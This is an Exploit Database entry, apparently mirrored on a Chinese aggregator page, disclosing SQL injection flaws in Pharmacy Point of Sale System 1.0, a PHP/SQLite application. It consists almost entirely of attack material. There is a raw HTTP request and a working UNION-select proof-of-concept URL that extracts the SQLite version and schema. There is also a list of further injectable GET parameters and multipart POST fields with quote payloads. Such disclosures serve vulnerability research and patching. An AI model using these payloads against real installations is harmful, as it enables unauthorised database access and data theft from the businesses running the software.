Pharmacy Point of Sale System 1.0 – ‘Multiple’ SQL Injection (SQLi)

• Exploit Database
• 18 阅读

• 作者： Murat
  日期： 2021-09-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50357/

• # Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
  # Date: 28.09.2021
  # Exploit Author: Murat
  # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
  # Version: 1.0
  # Tested on: Windows 10
  
  # Pharmacy Point of Sale System v1.0 SQLi
  
  
  GET /pharmacy/view_product.php?id=-1 HTTP/1.1
  Host: localhost
  Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6
  Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
  Sec-Ch-Ua-Mobile: ?0
  Sec-Ch-Ua-Platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate
  Connection: close
  
  
  POC:
  https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1--
  
  -----------------------------------------------------------------------
  
  #Other parameters with sql injection vulnerability;
  
  
  ==> /pharmacy/?date_from=&date_to=1'"&page=sales_report
  
  ==> /pharmacy/?date_from=1'"&date_to=&page=sales_report
  
  ==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1
  
  ==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true
  
  ==> /pharmacy/manage_product.php?id=-1'
  
  ==> POST /pharmacy/Actions.php?a=save_stock
  
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="id"
  
  
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="supplier_id"
  
  1'"
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="product_id"
  
  2'"
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="quantity"
  
  1'"
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="expiry_date"
  
  
  ==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1
  
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="id"
  
  5'"
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="product_code"
  
  94102'"
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="category_id"
  
  1'"
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="name"
  
  pHqghUme'"
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="price"
  
  1'"
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="description"
  
  1'"
  ------------YWJkMTQzNDcw
  Content-Disposition: form-data; name="status"
  
  0'"
  ------------YWJkMTQzNDcw--
  -